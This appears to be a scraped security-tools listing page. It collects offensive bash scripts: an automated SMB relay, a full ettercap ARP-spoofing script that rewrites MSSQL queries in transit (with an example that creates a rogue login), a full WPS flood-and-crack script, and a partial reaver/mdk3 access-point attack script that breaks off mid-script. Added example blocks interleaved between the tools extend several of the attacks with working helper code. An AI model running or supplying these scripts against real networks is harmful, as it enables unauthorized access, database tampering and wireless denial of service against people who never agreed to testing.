Channel: Bash Script – Security List Network™

Chuckle – An automated SMB Relay Script.


Latest Change 2/3/2016: chuckle.sh; modified to use unixwiz nbtscan for reliability.

Chuckle requires a few tools to work:
+ Nmap
+ Responder
+ SMBRelayX
+ Latest version of Veil
+ metasploit

Usage should be fairly simple; run as root or use sudo:

sudo ./chuckle.sh

Wait a while, or coax a privileged user into authenticating against you, and you should end up with a shell on the target machine. Be careful when running this, and never run it on a network where you are not permitted to do so.

Usage :

git clone https://github.com/nccgroup/chuckle && cd chuckle
sudo ./chuckle.sh
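
An SMB relay only succeeds against hosts that do not require SMB signing, so before running Chuckle it is worth knowing which hosts in the range qualify. The helper below is an added example and not part of Chuckle: it runs nmap's smb2-security-mode script (or reads a saved scan) and prints the hosts whose signing is enabled but not required, which is the set a relay can be pointed at. The embedded scan output is constructed to mirror nmap's normal-output layout, and the subnet and output file name are placeholders.

```shell
#!/bin/bash
# Added example (not part of Chuckle): list hosts that do not require SMB
# signing, i.e. the only hosts an SMB relay can be pointed at.

# Read nmap normal output (file args or stdin) and print the address of each
# host whose smb2-security-mode result is anything other than "enabled and
# required". Domain controllers require signing by default and are skipped.
relay_targets() {
        awk '
                /^Nmap scan report for / {
                        host = $NF
                        gsub(/[()]/, "", host)   # "name (10.0.1.5)" -> "10.0.1.5"
                }
                /Message signing/ {
                        if ($0 ~ /enabled and required/) next
                        print host
                }
        ' "$@"
}

# Constructed sample in the shape of nmap normal output for three hosts
sample_scan() {
        cat <<'EOF'
Nmap scan report for dc01.corp.local (10.0.1.5)
Host is up (0.0010s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

Nmap scan report for 10.0.1.20
Host is up (0.0020s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   2.1:
|_    Message signing enabled but not required

Nmap scan report for 10.0.1.30
Host is up (0.0030s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   2.1:
|_    Message signing enabled but not required
EOF
}

# Usage: ./smb_relay_targets.sh scan   (runs nmap against a placeholder subnet)
#        ./smb_relay_targets.sh demo   (parses the constructed sample above)
case "${1:-}" in
        scan)
                sudo nmap -p445 --script smb2-security-mode -oN smb-signing.txt 10.0.1.0/24 >/dev/null
                relay_targets smb-signing.txt
                ;;
        demo)
                sample_scan | relay_targets
                ;;
esac
```

Run the scan from the same segment you will relay on; a host that answers "enabled and required" (the default for domain controllers) is not a usable relay target and will only burn the captured authentication.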

Source: https://github.com/nccgroup


SQLinject.sh – Script to automate the process of hijacking an MSSQL database connection.


This script automates hijacking an MSSQL database connection. It performs a MITM attack between two IP addresses using ettercap and ARP spoofing; you supply the original SQL query and a replacement query, and the script creates, compiles and loads an ettercap filter that swaps the original SQL string for yours on the wire. The replacement must be no longer than the original, and the technique only works on MSSQL connections that are not encrypted.

SQLinject.sh Script:

#!/bin/bash
#
####################################################################
#
# Written by Rick Osgood
#
# This script is designed to automate the process of hijacking an
# MSSQL database connection. This script can be used to perform a
# MITM attack between two IP addresses using ettercap and ARP
# spoofing. You also submit an original SQL query and a new SQL
# query. The script will create, compile, and load an ettercap
# filter to replace the original SQL string with your new one.
# This should work on any MSSQL connection that is not encrypted.
#
# Requires: ettercap/etterfilter, od (coreutils) and root privileges.
#
####################################################################

# Set variable defaults
SqlPort=1433
ServerIP=""
ClientIP=""
FileName=""
OldQuery=""
NewQuery=""

# Help function
print_help(){
        echo "Usage: ./SQLInject.sh -o [original SQL query] -i [new SQL query] -s [MSSQL Server IP] -c [SQL Client IP] -f [filter file]"
        echo ""
        echo "Example: ./SQLInject.sh -o \"SELECT * from Products WHERE ProductID=1 ORDER BY Name;\" -i \"CREATE LOGIN hacker WITH PASSWORD='password01';\" -s 10.0.1.20 -c 10.0.1.100 -f sql.filter"
        echo ""
        echo "This script creates an ettercap filter that will identify a SQL string"
        echo "and replace it with a new string. The script will then compile the filter"
        echo "and run ettercap with the filter loaded. Ettercap will perform an ARP"
        echo "spoofing attack against the specified IP addresses automatically. All you"
        echo "have to do is sit back and wait for the original query to be submitted."
        echo ""
        echo " --help"
        echo "     Show this message."
        echo " -o"
        echo "     Specify the original SQL string to be replaced."
        echo " -i"
        echo "     Specify the new SQL string to be injected. This string must not be"
        echo "     longer than the original query string (it is space-padded to match)."
        echo " -s"
        echo "     Specify the MSSQL server IP for the ARP poison attack. May also use the gateway IP."
        echo " -c"
        echo "     Specify the SQL client IP for the ARP poison attack."
        echo " -f"
        echo "     Specify the output filename for the ettercap filter."
        echo " -p"
        echo "     Optional. Specify the MSSQL traffic port. Defaults to 1433."
}

# Parse command line arguments
while [ $# -gt 0 ]; do
        case "$1" in
                --help) print_help; exit 0 ;;
                -o) OldQuery="$2"; shift ;;
                -i) NewQuery="$2"; shift ;;
                -s) ServerIP="$2"; shift ;;
                -c) ClientIP="$2"; shift ;;
                -f) FileName="$2"; shift ;;
                -p) SqlPort="$2"; shift ;;
                *)
                        echo "Error: Unknown argument \"$1\""
                        echo ""
                        print_help
                        exit 1 ;;
        esac
        shift
done

# Is anything missing?
if [ -z "$OldQuery" ] || [ -z "$NewQuery" ]; then
        echo "You must specify both the original (-o) and the new (-i) SQL query!"
        print_help
        exit 1
elif [ -z "$ServerIP" ]; then
        echo "You must specify server IP!"
        exit 1
elif [ -z "$ClientIP" ]; then
        echo "You must specify client IP!"
        exit 1
elif [ -z "$FileName" ]; then
        echo "You must specify the file name for the ettercap filter!"
        exit 1
fi

# Compare lengths. TDS carries the batch as UTF-16LE, so every character
# occupies two bytes on the wire; the replacement must not be longer.
length1=${#OldQuery}
length2=${#NewQuery}
difference=$((length1 - length2))
echo "Original string is $length1 characters ($((length1 * 2)) bytes on the wire)"
echo "New string is $length2 characters ($((length2 * 2)) bytes on the wire)"
echo "Difference is $difference characters"

# If the new string is too long it won't work: an in-place replace must keep
# the TCP payload length unchanged.
if [ "$difference" -lt 0 ]; then
        echo ""
        echo "New SQL query is longer than original! Quitting..."
        exit 1
fi

# Pad the new query with trailing spaces so both strings have the same length
PaddedQuery=$(printf "%-${length1}s" "$NewQuery")
echo "PaddedQuery is \"$PaddedQuery\""
echo ""

# Convert a string to the \xHH\x00 form etterfilter expects: each byte is
# followed by a NUL, which is how the text appears over the wire (UTF-16LE).
# od is used instead of a per-character shell loop so that characters such
# as '*' are never subjected to word splitting or pathname expansion.
to_wire_hex() {
        printf '%s' "$1" | od -An -v -tx1 | tr -d ' \n' | sed 's/../\\x&\\x00/g'
}

echo "Converting original query to hex..."
OldQueryHex=$(to_wire_hex "$OldQuery")

echo "Converting new query to hex..."
NewQueryHex=$(to_wire_hex "$PaddedQuery")

echo "Writing ettercap filter now..."

# Write the ettercap filter source file
cat > "$FileName" <<EOF
if (ip.proto == TCP && tcp.dst == $SqlPort) {
       msg("SQL traffic discovered");
       if (search(DATA.data, "$OldQueryHex")) {
              msg("Found our string!");
              replace("$OldQueryHex", "$NewQueryHex");
              msg("...and replaced it :)");
       }
}
EOF

# Execute etterfilter to create the compiled filter
etterfilter "$FileName" -o "$FileName.ef" || { echo "etterfilter failed"; exit 1; }

# Execute ettercap and load the filter
ettercap -T -q -F "./$FileName.ef" -M ARP "//$ServerIP//" "//$ClientIP//"

echo ""
echo "Completed Successfully!"

Source: http://pastebin.com/Nge9rx7g
Usage details: https://blog.anitian.com/hacking-microsoft-sql-server-without-a-password/
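
The filter only works if the search string matches the bytes the client actually puts on the wire, so it pays to build and check the strings offline before ARP-spoofing anything. The block below is an added example, not the script above or Rick Osgood's code: it encodes the queries the way a TDS SQL batch carries them (UTF-16LE, so each ASCII byte is followed by a NUL), pads the replacement to the original's length, emits the etterfilter source, and then applies the same replace to a constructed SQL_BATCH packet and decodes the result. The 8-byte header is a simplified TDS header for illustration; the function names and sample queries are my own.

```shell
#!/bin/bash
# Added example (not the page's script): build the etterfilter search/replace
# strings for an MSSQL (TDS) SQL batch and verify them against a constructed
# packet offline.
# Assumption: the client sends the batch unencrypted as a TDS SQL_BATCH packet
# (type 0x01) whose text is UTF-16LE. The header below is simplified.

# ASCII string -> \xHH\x00 form that etterfilter's search()/replace() accept.
tds_hex() {
        printf '%s' "$1" | od -An -v -tx1 | tr -d ' \n' | sed 's/../\\x&\\x00/g'
}

# Same encoding as plain hex digits (no \x), used for the offline packet check.
tds_rawhex() {
        printf '%s' "$1" | od -An -v -tx1 | tr -d ' \n' | sed 's/../&00/g'
}

# Pad the new query with spaces to the original's length; fail if it is longer,
# because the in-place replace must not change the TCP payload length.
pad_query() {
        local orig="$1" new="$2"
        [ "${#new}" -le "${#orig}" ] || return 1
        printf "%-${#orig}s" "$new"
}

# Emit etterfilter source for the given port, original and replacement query.
make_filter() {
        local port="$1" orig="$2" new="$3" padded
        padded=$(pad_query "$orig" "$new") || { echo "replacement longer than original" >&2; return 1; }
        cat <<EOF
if (ip.proto == TCP && tcp.dst == $port) {
    if (search(DATA.data, "$(tds_hex "$orig")")) {
        replace("$(tds_hex "$orig")", "$(tds_hex "$padded")");
        msg("SQL batch replaced");
    }
}
EOF
}

# Constructed SQL_BATCH packet as a hex string: type 01, status 01 (end of
# message), big-endian total length, spid 0000, packet id 01, window 00, text.
build_batch_hex() {
        local body len
        body=$(tds_rawhex "$1")
        len=$(( 8 + ${#body} / 2 ))
        printf '0101%04x00000100%s' "$len" "$body"
}

# Simulate ettercap's in-place replace on the hex packet.
replace_in_packet() {
        local pkt="$1" o n
        o=$(tds_rawhex "$2")
        n=$(tds_rawhex "$3")
        printf '%s' "${pkt//"$o"/$n}"
}

# Skip the 8-byte header, drop the NUL after each byte, hex -> ASCII.
decode_batch_text() {
        local text="${1:16}"
        printf '%b' "$(printf '%s' "$text" | sed 's/\(..\)00/\\x\1/g')"
}

# Usage: ./tds_filter.sh demo
if [ "${1:-}" = "demo" ]; then
        ORIG="SELECT * FROM Products WHERE ProductID = 1001;"
        NEW="CREATE LOGIN hacker WITH PASSWORD='p@ss01';"
        make_filter 1433 "$ORIG" "$NEW"
        pkt=$(build_batch_hex "$ORIG")
        padded=$(pad_query "$ORIG" "$NEW")
        echo "Decoded after replace: $(decode_batch_text "$(replace_in_packet "$pkt" "$ORIG" "$padded")")"
fi
```

Two caveats the offline check cannot catch: ettercap's search() works per packet, so a batch split across TCP segments will not match, and a server configured with Force Encryption (TLS on the TDS stream) defeats the whole approach, which is the real mitigation.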

WPS-SLAUGHTER : A WPS cracking script.


This tool automates testing whether a router's WPS implementation is vulnerable to flood attacks: it floods the access point from one or more wireless adapters to see whether it reboots and unlocks WPS.

usage:
git clone https://github.com/ApatheticEuphoria/WPS-SLAUGHTER && cd WPS-SLAUGHTER
chmod +x WPS-SLAUGHTER.sh
./WPS-SLAUGHTER.sh

Script:

#!/bin/bash
# WPS-SLAUGHTER: flood a WPS-enabled access point from one to five wireless
# adapters (mdk3 EAPOL-Start or authentication floods) to see whether it
# reboots and unlocks WPS, then run reaver against it.
# Requires: rfkill, ifconfig, iwconfig, macchanger, wash, mdk3, reaver,
# gnome-terminal and timeout. Interface changes are run through sudo.

declare BSSID
declare ESSID
declare CHANNEL
declare -a ADAPTERS
# Locally administered address used when the adapters are given the same MAC
SPOOF_MAC="02:22:88:29:EC:6F"

echo "
██╗    ██╗██████╗ ███████╗      ███████╗██╗      █████╗ ██╗   ██╗ ██████╗ ██╗  ██╗████████╗███████╗██████╗ 
██║    ██║██╔══██╗██╔════╝      ██╔════╝██║     ██╔══██╗██║   ██║██╔════╝ ██║  ██║╚══██╔══╝██╔════╝██╔══██╗
██║ █╗ ██║██████╔╝███████╗█████╗███████╗██║     ███████║██║   ██║██║  ███╗███████║   ██║   █████╗  ██████╔╝
██║███╗██║██╔═══╝ ╚════██║╚════╝╚════██║██║     ██╔══██║██║   ██║██║   ██║██╔══██║   ██║   ██╔══╝  ██╔══██╗
╚███╔███╔╝██║     ███████║      ███████║███████╗██║  ██║╚██████╔╝╚██████╔╝██║  ██║   ██║   ███████╗██║  ██║
 ╚══╝╚══╝ ╚═╝     ╚══════╝      ╚══════╝╚══════╝╚═╝  ╚═╝ ╚═════╝  ╚═════╝ ╚═╝  ╚═╝   ╚═╝   ╚══════╝╚═╝  ╚═╝
"

echo "WPS-SLAUGHTER BY: APATHETIC EUPHORIA"

sudo rfkill unblock all

echo "************** - How Many Wlan Adapters Would You Like To Use? - **************
1)1 Adapter
2)2 Adapters
3)3 Adapters
4)4 Adapters
5)5 Adapters"

read -r a
case "$a" in
	[1-5]) ;;
	*) echo "Invalid Option"; exit 1 ;;
esac

# Collect the adapter names (wlan0, wlan1, ...)
ORDINAL=(1st 2nd 3rd 4th 5th)
for (( n = 0; n < a; n++ )); do
	echo
	read -r -p " - What is the name of your ${ORDINAL[$n]} Wlan Adapter (Ex:wlan$n) - : " "ADAPTERS[$n]"
done

echo "------------------------------"
echo "Enabling Monitor Mode"
for dev in "${ADAPTERS[@]}"; do
	sudo ifconfig "$dev" down
	sleep 3
	sudo iwconfig "$dev" mode monitor
	sleep 3
	sudo ifconfig "$dev" up
done
echo "Monitor Mode Enabled"
echo "------------------------------"

if [ "$a" -eq 1 ]; then
	echo "************** - Would you like to Change the Wlan Adapter's MAC Address? - **************"
else
	echo "************** - Would you like to set ALL Wlan Adapters to the same MAC Address? - **************"
fi
echo "1)Yes
2)No"

read -r c
case "$c" in
	1)
echo "------------------------------"
echo "Setting the MAC Address"
for dev in "${ADAPTERS[@]}"; do
	sudo ifconfig "$dev" down
	sleep 3
	sudo macchanger -m "$SPOOF_MAC" "$dev"
	sleep 3
	sudo ifconfig "$dev" up
done
echo "MAC Changed"
echo "------------------------------"
;;
	2)
;;
	*) echo "Invalid Option"
;;
esac

# wash lists WPS-enabled networks and whether WPS is currently locked
scan_targets () {
	gnome-terminal --geometry=111x20 --title='Scanning for targets' -e "wash -i ${ADAPTERS[0]}"
}

scan_targets

echo
read -r -p " - What is the BSSID(MAC) of the Target - : " BSSID

echo
read -r -p " - What is the ESSID(Ap Name) of the Target - : " ESSID

echo
read -r -p " - What is the CHANNEL # of the Target - : " CHANNEL
echo "-------------------------------------"

# Run the same mdk3 flood on every adapter at once and wait for all to finish
eapol_start_flood () {
	for dev in "${ADAPTERS[@]}"; do
		timeout 20s mdk3 "$dev" x 0 -t "$BSSID" -n "$ESSID" -s 250 &
	done
	wait
}

auth_flood () {
	for dev in "${ADAPTERS[@]}"; do
		timeout 60 mdk3 "$dev" a -a "$BSSID" -m &
	done
	wait
}

menu () {
while true; do
echo "************** - Which Attack Would You Like To Use? - **************
1)EAPOL Start Flood
2)Authentication Flood
3)Reaver
4)Check if Access Point WPS is UNLOCKED
5)Quit"

read -r d
case "$d" in
	1) eapol_start_flood ;;
	2) auth_flood ;;
	3) reaver -i "${ADAPTERS[0]}" -b "$BSSID" -c "$CHANNEL" -vv ;;
	4) scan_targets ;;
	5) break ;;
	*) echo "Invalid Option" ;;
esac
done
}

menu
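
Menu option 4 above leaves it to the operator to read the Lck column in a wash window. The block below is an added example, not part of WPS-SLAUGHTER: it pulls the lock flag for one BSSID out of wash output and polls until the access point reports WPS unlocked, which is the signal that the flood worked. The sample lines are constructed to follow the column layout of wash from reaver 1.6.x (BSSID, Ch, dBm, WPS, Lck, Vendor, ESSID); older wash builds print different columns, and the interface and BSSID in the usage line are placeholders.

```shell
#!/bin/bash
# Added example (not part of WPS-SLAUGHTER): read the WPS lock flag for one
# BSSID out of wash output, and poll until the AP reports unlocked.
# Column layout follows wash from reaver 1.6.x; the sample is constructed.

# Print the Lck column ("Yes"/"No") for a BSSID read from wash output on
# stdin, or "absent" when the AP was not seen at all. If wash printed the
# AP more than once, the last line wins.
wps_lock_state() {
        local bssid
        bssid=$(printf '%s' "$1" | tr 'a-f' 'A-F')
        awk -v b="$bssid" '
                toupper($1) == b { state = $5; found = 1 }
                END { print (found ? state : "absent") }
        '
}

# Constructed wash output for two access points
sample_wash() {
        cat <<'EOF'
BSSID               Ch  dBm  WPS  Lck  Vendor    ESSID
--------------------------------------------------------------------------------
00:11:22:33:44:55    6  -41  2.0  Yes  Broadcom  TestNet
66:77:88:99:AA:BB   11  -67  1.0  No   RalinkTe  OtherNet
EOF
}

# Poll wash (15 s per run) every $3 seconds until the BSSID shows Lck = No.
# Returns 0 once unlocked, 1 if the AP is missing for $4 consecutive polls.
wait_for_unlock() {
        local iface="$1" bssid="$2" interval="${3:-30}" max_absent="${4:-10}"
        local state absent=0
        while :; do
                state=$(timeout 15 wash -i "$iface" 2>/dev/null | wps_lock_state "$bssid")
                case "$state" in
                        No)  echo "WPS unlocked on $bssid"; return 0 ;;
                        Yes) absent=0; echo "still locked, retrying in ${interval}s" ;;
                        *)   absent=$((absent + 1))
                             if [ "$absent" -ge "$max_absent" ]; then
                                     echo "AP not seen for $absent polls"; return 1
                             fi ;;
                esac
                sleep "$interval"
        done
}

# Usage: ./wps_lock.sh demo
#        ./wps_lock.sh wait wlan0mon 00:11:22:33:44:55
case "${1:-}" in
        demo) sample_wash | wps_lock_state 00:11:22:33:44:55 ;;
        wait) wait_for_unlock "$2" "$3" ;;
esac
```

The absent counter matters in practice: an AP that is rebooting under the flood drops out of wash output entirely for a while, so "not seen" is not the same as "unlocked" and should not end the wait early.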

Source: https://github.com/ApatheticEuphoria

ranger v0.43b – A tool to support security professionals to access and interact with remote Microsoft Windows based systems.


Latest Change v0.43b (25/2/2016):
+ ranger.py:
— WMIEXEC Metasploit web_delivery Memory Injector.
— ATEXEC Metasploit web_delivery Memory Injector.
— Create Pasteable web_delivery Attack.

A tool to support security professionals in accessing and interacting with remote Microsoft Windows based systems.
This project was conceptualized with the thought that we did not invent the bow or the arrow, just a more efficient way of using them. Ranger is a command-line driven attack and penetration testing tool which has the ability to use an instantiated catapult server to deliver capabilities against Windows systems. As long as a user has a set of credentials or a hash set (NTLM, LM, LM:NTLM) he or she can gain access to systems that are part of the trust.
Using this capability a security professional can extract credentials out of memory in clear text, access SAM tables, run commands, and execute PowerShell scripts, Windows binaries and other tools. According to the project, at this time the tool bypasses the majority of IPS vendor solutions unless they have been custom tuned to detect it. The tool was developed in the authors' home labs in an effort to support security professionals doing legally and/or contractually supported activities.
More functionality is being added, but at this time the tool uses community contributions from repositories related to PowerShell PowerView, PowerShell Mimikatz and Impacket.

Dependency:
+ Nmap
+ Metasploit

Method & Attack
Method:
--wmiexec
--psexec
--atexec
Attack:
--command
--invoker
--downloader
--executor
--domain-group-members
--local-group-members
--get-domain-membership
--get-forest-domains
--get-forest
--get-dc
--find-la-access

Installation:

wget https://raw.githubusercontent.com/funkandwagnalls/ranger/master/setup.sh
chmod a+x setup.sh
./setup.sh
rm setup.sh

Update:
ranger --update

Source: https://github.com/funkandwagnalls

wifi hacking script v1.3 supported securities: WEP, WPS, WPA, WPA2.


Shell script for attacking wireless networks using the tools built into Kali. Supports WEP, WPS, WPA and WPA2.
Menu Options:
0) Full Automatic Mode (Applies To All Encryption Types)
1) WEP Mode (Commands can be executed from a menu to easily circumvent any WEP connection)
2) WPS Mode (May also have WPA, WPA2, or WEP displayed. Ignore this, as it has no effect on success rate)
3) WPA Mode (Capture 4-way handshake, dictionary attack, bruteforce and others, VERY LOW SUCCESS RATE)
4) WPA2 Mode (Almost identical to WPA attacks. This mode also carries a VERY LOW SUCCESS RATE)

usage:

git clone https://github.com/esc0rtd3w/wifi-hacker && cd wifi-hacker
chmod +x wifi-hacker.sh
./wifi-hacker.sh

Source: https://github.com/esc0rtd3w

ReVdK3 Acces Point pentest Script.


This script was created for access points that lock up for long periods of time. It works by starting reaver and continuously checking whether reaver reports that the AP is rate limiting PINs; once it does, the script starts mdk3 attacks. The mdk3 attacks are killed once reaver detects that the AP has unlocked itself.
Requirements:
[1] reaver
[2] bully
[3] mdk3
[4] aireplay-ng
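
The description above is a small state machine: reaver's output says whether the AP is rate limiting, and that decides whether an mdk3 flood should be running. The block below is an added example, not ReVdK3's own code: it puts the decision in a testable function that reads a reaver log, counts lockouts, and wraps it in the supervision loop. The sample log lines are constructed to mirror reaver 1.4's wording, the interface names and BSSID are placeholders, and reaver and mdk3 are only invoked from run_supervised, which expects a separate monitor interface for the flood (the mon1 style interfaces ReVdK3 creates).

```shell
#!/bin/bash
# Added example (not ReVdK3's own code): the reaver/mdk3 supervision loop
# with the decision logic in a testable function. reaver's -vv output is
# captured to a log file; its newest status line decides whether the AP is
# rate limiting. Sample lines are constructed in reaver 1.4's wording.

# Print "locked", "unlocked" or "unknown" from a reaver log: the last line
# that mentions rate limiting or a PIN attempt wins.
reaver_state() {
        awk '
                /Detected AP rate limiting/ { state = "locked" }
                /Trying pin|WPS PIN:/       { state = "unlocked" }
                END { print (state == "" ? "unknown" : state) }
        ' "$1"
}

# Total number of rate-limiting warnings reaver has printed so far.
lockouts() {
        grep -c 'Detected AP rate limiting' "$1" || true
}

# Constructed reaver output written to the given file.
write_sample_log() {
        cat > "$1" <<'EOF'
[+] Waiting for beacon from 00:11:22:33:44:55
[+] Associated with 00:11:22:33:44:55 (ESSID: TestNet)
[+] Trying pin 12345670
[+] Trying pin 00005678
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
EOF
}

# Start reaver on $1; whenever it reports rate limiting, run an mdk3
# EAPOL-Start flood from $2 until reaver gets back to trying PINs.
run_supervised() {   # args: reaver_iface flood_iface bssid essid channel
        local riface="$1" fiface="$2" bssid="$3" essid="$4" chan="$5"
        local log flood_pid="" reaver_pid
        log=$(mktemp)
        reaver -i "$riface" -b "$bssid" -c "$chan" -vv >"$log" 2>&1 &
        reaver_pid=$!
        trap 'kill "$reaver_pid" $flood_pid 2>/dev/null; rm -f "$log"' EXIT
        while kill -0 "$reaver_pid" 2>/dev/null; do
                if [ "$(reaver_state "$log")" = locked ]; then
                        if [ -z "$flood_pid" ]; then
                                echo "AP locked ($(lockouts "$log") times so far): starting EAPOL flood"
                                mdk3 "$fiface" x 0 -t "$bssid" -n "$essid" -s 250 &
                                flood_pid=$!
                        fi
                elif [ -n "$flood_pid" ]; then
                        echo "AP unlocked: stopping flood"
                        kill "$flood_pid" 2>/dev/null
                        flood_pid=""
                fi
                sleep 5
        done
}

# Usage: ./revdk3_watch.sh demo
#        ./revdk3_watch.sh run wlan0mon mon1 00:11:22:33:44:55 TestNet 6
case "${1:-}" in
        demo)
                f=$(mktemp); write_sample_log "$f"
                echo "state: $(reaver_state "$f"), lockouts: $(lockouts "$f")"
                echo '[+] Trying pin 00005678' >>"$f"
                echo "after reaver resumes: $(reaver_state "$f")"
                rm -f "$f"
                ;;
        run) shift; run_supervised "$@" ;;
esac
```

Keeping reaver's own log as the source of truth, rather than guessing from timing, is what lets the loop stop the flood promptly: as soon as reaver prints another "Trying pin" line the state flips to unlocked and mdk3 is killed, so the flood does not knock the AP over again while PINs are being tested.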

Usage:

git clone https://github.com/r0bag/pentest && cd pentest
chmod +x *.sh
./ReVdK3-r3.sh

Script:

#!/bin/bash
declare MAC;
declare PIN_TIME;
declare WLAN;
declare MON1;
declare MON2;
declare MON3;
declare PHY_OF_WLAN_1;
declare NO_OF_MONITOR_INTERFACES_CHECK;
declare MONITOR_INTERFACES;
declare STOP_INTERFACE;
declare VARIABLE;
declare CHANNEL;
declare DISTANCE_BETWEEN_PINS;
declare TIMEOUT;
declare ESSID;
declare SATISFIED_OPTION=r;
declare REAVER_COMMAND_LINE;
declare MDK3_MAIN_MENU_OPTION;
declare RETURN_OPTION_FOR_AUTH_DOS_FOR_AUTH_DOS;
declare RETURN_OPTION_FOR_EAPOL_START_FLOOD;
declare EAPOL_START_FLOOD_COMMAND;
declare AUTH_DOS_FLOOD_COMMAND;
declare RETURN_OPTION_FOR_EAPOL_LOG_OFF_FLOOD;
declare EAPOL_LOG_OFF_FLOOD_COMMAND;
declare VARIABLE_CHECK_FOR_RATE_LIMITING;
declare TARGET_STATION;
declare MDK3_KILLALL_1
declare AIREPLAY_KILLALL;
declare SUCCESSIVE_EAPOL_FAILURES;
declare AIREPLAY_RESET;
declare MONITOR_INTERFACES_CHECK;
declare GO_STATUS;
declare NO_GO_STATUS
clear
GO_STATUS=`echo -e "\e[31m[\e[34mAffirmative\e[31m]\e[0m"`
NO_GO_STATUS=`echo -e "\e[31m[\e[33mNegative\e[31m]\e[0m"`
REAVER_CHECK=`which reaver`
BULLY_CHECK=`which bully`
MDK3_CHECK=`which mdk3`
AIREPLAY_NG_CHECK=`which aireplay-ng`
GNOME_TERMINAL_CHECK=`which gnome-terminal`
TIMEOUT_CHECK=`which timeout`
echo -e "\e[36mChecking to see if the following programs are installed";
echo -e "\e[36mProgram                     Exist?"
echo -ne "\e[36m[1] reaver";
if [  -z "$REAVER_CHECK" ]; then
echo -e "                  $NO_GO_STATUS";
else
echo -e "                  $GO_STATUS";
fi
sleep 0.2
echo -ne "\e[36m[2] bully";
if [ -z "$BULLY_CHECK" ]; then
echo -e "                   $NO_GO_STATUS";
else
echo -e "                   $GO_STATUS";
fi
sleep 0.2
echo -ne "\e[36m[3] mdk3";
if [ -z "$MDK3_CHECK" ]; then
echo -e "                    $NO_GO_STATUS";
else
echo -e "                    $GO_STATUS";
fi
sleep 0.2
echo -ne "\e[36m[4] aireplay-ng";
if [ -z  "$AIREPLAY_NG_CHECK" ]; then
echo -e "             $NO_GO_STATUS";
else
echo -e "             $GO_STATUS";
fi
sleep 0.2
echo -ne "\e[36m[5] gnome-terminal";
if [ -z "$GNOME_TERMINAL_CHECK" ]; then
echo -e "          $NO_GO_STATUS";
else
echo -e "          $GO_STATUS";
fi
sleep 0.2
echo -ne "\e[36m[6] timeout";
if [ -z "$TIMEOUT_CHECK" ]; then
echo -e "                 $NO_GO_STATUS";
else
echo -e "                 $GO_STATUS";
fi
sleep 0.2
if [ -z "$MDK3_CHECK" ]; then
echo -e "\e[31m\e[1mmdk3 is not installed.Exiting script...";
exit
fi
if [ -z "$AIREPLAY_NG_CHECK" ]; then
echo -e "\e[31m\e[1maireplay-ng is not installed.Exiting script...";
exit
fi
if [ -z "$GNOME_TERMINAL_CHECK" ]; then
echo -e "\e[31m\e[1mgnome-terminal is not installed.Exiting script...";
exit
fi
if [ -z "$TIMEOUT_CHECK" ]; then
echo -e "\e[31m\e[1mtimeout is not installed.Exiting script...";
exit
fi
clear
# WELCOME MESSAGE
echo -e "\e[36m\e[1m###########################\e[0m";
echo -e "\e[36m\e[1m# WELCOME TO ReVdK3 Script#\e[0m";
echo -e "\e[36m\e[1m###########################\e[0m";
echo -e "\e[36m\e[1m#####################################################################\e[0m";
echo -e "\e[36m\e[1m# This Script allows you to use reaver and an mdk3 flood attack that#\e[0m";
echo -e "\e[36m\e[1m# you choose                                                        #\e[0m"; 
echo -e "\e[36m\e[1m#####################################################################\e[0m";
echo -e "\e[36m\e[1m# This Script was created for Access Points that locks up for long  #\e[0m";
echo -e "\e[36m\e[1m# periods of time. It works by starting reaver and continuously     #\e[0m";
echo -e "\e[36m\e[1m# detects when reaver is rate limiting pins, once reaver detects    #\e[0m";
echo -e "\e[36m\e[1m# the AP is rate limiting pins, it starts mdk3 attacks. mdk3 attacks#\e[0m";
echo -e "\e[36m\e[1m# are killed once reaver detects that the AP has unlocked itself !  #\e[0m";
echo -e "\e[36m\e[1m# The process goes on...                                            #\e[0m";
echo -e "\e[36m\e[1m#####################################################################\e[0m";
echo ;
echo  -e "\e[37m\e[44m\e[1m ReVdK3.sh-r3 \e[0m";
echo ;
echo ;
echo -e	"\e[36m\e[40m\e[1m******************************************************\e[0m";
echo -e "\e[36m\e[40m\e[1m* Welcome: I need to verify your wireless interface  *\e[0m";
echo -e	"\e[36m\e[40m\e[1m******************************************************\e[0m";
echo ; 
read -p "Which wireless interface you will be using? e.g wlan0, wlan0mon etc": WLAN; 
EXISTENCE_OF_WLAN=`airmon-ng|grep ''"$WLAN"|cut -f2`;
while [   -z "$WLAN" -o "$EXISTENCE_OF_WLAN" != "$WLAN" ]; do
echo -e "\e[31m\e[1mYou input a wireless interface that doesn't exist!\e[0m";
echo ;
read -p "Which wireless interface you will be using? e.g wlan0, wlan0mon etc": WLAN; 
EXISTENCE_OF_WLAN=`airmon-ng|grep ''"$WLAN"|cut -f2`;
done
PHY_OF_WLAN_1=`airmon-ng|grep $WLAN|cut -d ' ' -f1|cut -c 1-4`;
NO_OF_MONITOR_INTERFACES_CHECK=`airmon-ng|grep -F "$PHY_OF_WLAN_1"|wc -l`;
MONITOR_INTERFACES=`airmon-ng|grep -F "$PHY_OF_WLAN_1"|cut -f1|tr -s [:space:] ' '`;
echo -e "\e[36m\e[1mKilling any existing monitor interface(s) on $WLAN\e[0m";
if [ "$NO_OF_MONITOR_INTERFACES_CHECK" != 1 ]; then
for STOP_INTERFACE in $MONITOR_INTERFACES; do
if [ "$STOP_INTERFACE" != "$WLAN"  ]; then
airmon-ng stop $STOP_INTERFACE > /dev/null;
fi   
done
fi
echo -e "\e[36m\e[1mSuccessful!\e[0m";

echo -e "\e[36m\e[1mI am hiding your identity by changing your mac\e[0m";

ifconfig $WLAN down
sleep 2
macchanger -r $WLAN
sleep 3
iwconfig $WLAN mode monitor
sleep 3
ifconfig $WLAN up


echo -e "\e[36m\e[1mStarting three new monitor interfaces...\e[0m";

#MON1=`airmon-ng start $WLAN|grep -F '(monitor mode enabled on '|tr -s [:space:] ' '|cut -d ' ' -f6|tr -d ')'`
#MON2=`airmon-ng start $WLAN|grep -F '(monitor mode enabled on '|tr -s [:space:] ' '|cut -d ' ' -f6|tr -d ')'`
#MON3=`airmon-ng start $WLAN|grep -F '(monitor mode enabled on '|tr -s [:space:] ' '|cut -d ' ' -f6|tr -d ')'`

